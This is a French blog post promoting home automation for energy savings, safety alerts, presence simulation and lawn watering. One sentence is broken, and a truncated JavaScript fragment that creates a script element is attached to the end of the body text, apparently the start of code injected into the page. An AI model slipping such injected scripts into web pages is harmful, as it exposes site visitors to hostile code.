/, Non classé/La domotique est un grand économiseur d’énergie !

La domotique est un grand économiseur d’énergie !

Quand les propriétaires sont absents, le système éteindra automatiquement les lumières et le système de chauffage. Autrement dit : Bonjour les économies radicales sur la consommation d’énergie !
La domotique dégage des visions intéressantes sur le plan de la De plus, la domotique signalera les incidents dangereux, comme les fuites, les débuts d’incendie et le cambriolage. Elle peut même lancer des actions ciblées :

  • Couper l’arrivée d’eau ou de gaz
  • Activer des extincteurs
  • Appeler le secours

C’est magique avec la domotique !

Si vous partez en vacances pour une période prolongée, un système domotique peut lever et baisser régulièrement les volets, pour simuler une présence humaine, ce qui augmente la sécurité de la maison.
La domotique favorise évidemment la communication ! Un PC central suffit pour le pilotage d’un grand nombre d’appareils et d’installations.
Ne vous souciez plus de l’arrosage de votre pelouse. Le système domotique prend en compte la température, l’humidité, le niveau des précipitations pour ajuster la quantité d’eau nécessaire pour l’arrosage.
De plus, l’intercommunication dans les chambres, permettra à tout le monde de communiquer avec tout le monde.
Il reste évidemment la question du prix. Combien coûte un système domotique ?
Il faut savoir que le coût d’une installation électrique intervient au coût de 3% dans un budget d’habitation moyen. Avec la domotique, il faut y rajouter 2%. Cela peut sembler beaucoup, mais l’investissement est très vite rentabilisé !
De plus, ce type d’installation est modulaire, et flexible. Vous pouvez l’étendre progressivement, en fonction de vos moyens et de vos besoins.
Il existe des systèmes domotiques adaptés à chaque type d’habitation, de la nouvelle villa à l’appartement en rénovation.var d=document;var s=d.createElement(‘script’);

Par | 2014-12-12T15:40:00+00:00 décembre 12th, 2014|Blog domotique, Non classé|Commentaires fermés sur La domotique est un grand économiseur d’énergie !

À propos de l'auteur :